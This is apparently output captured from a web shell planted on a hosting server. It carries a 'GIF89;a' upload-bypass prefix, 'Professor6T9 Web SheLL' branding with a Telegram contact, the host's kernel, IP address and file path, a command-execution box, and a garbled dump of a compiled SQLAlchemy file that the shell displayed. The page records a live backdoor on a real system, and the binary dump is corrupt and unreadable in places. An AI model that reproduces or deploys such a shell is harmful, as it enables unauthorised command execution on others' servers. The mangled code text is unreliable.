GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
sqlalchemy
/
dialects
/
mysql
/
__pycache__
[ HOME ]
Exec
Submit
gaerdbms.cpython-311.pyc
� �|oi/ � �d � d Z ddlZddlZddlmZ ddlmZ ddlmZ d� Z G d � d e� � Z e ZdS )a} .. dialect:: mysql+gaerdbms :name: Google Cloud SQL :dbapi: rdbms :connectstring: mysql+gaerdbms:///<dbname>?instance=<instancename> :url: https://developers.google.com/appengine/docs/python/cloud-sql/developers-guide This dialect is based primarily on the :mod:`.mysql.mysqldb` dialect with minimal changes. .. deprecated:: 1.0 This dialect is **no longer necessary** for Google Cloud SQL; the MySQLdb dialect can be used directly. Cloud SQL now recommends creating connections via the mysql dialect using the URL format ``mysql+mysqldb://root@/<dbname>?unix_socket=/cloudsql/<projectid>:<instancename>`` Pooling ------- Google App Engine connections appear to be randomly recycled, so the dialect does not pool connections. The :class:`.NullPool` implementation is installed within the :class:`_engine.Engine` by default. � N)�warn_deprecated� )�MySQLDialect_mysqldb� ��NullPoolc �h � t j � dd� � � d� � S )N�SERVER_SOFTWARE� zDevelopment/)�os�environ�get� startswith� � �Y/opt/cloudlinux/venv/lib64/python3.11/site-packages/sqlalchemy/dialects/mysql/gaerdbms.py�_is_dev_environmentr + s'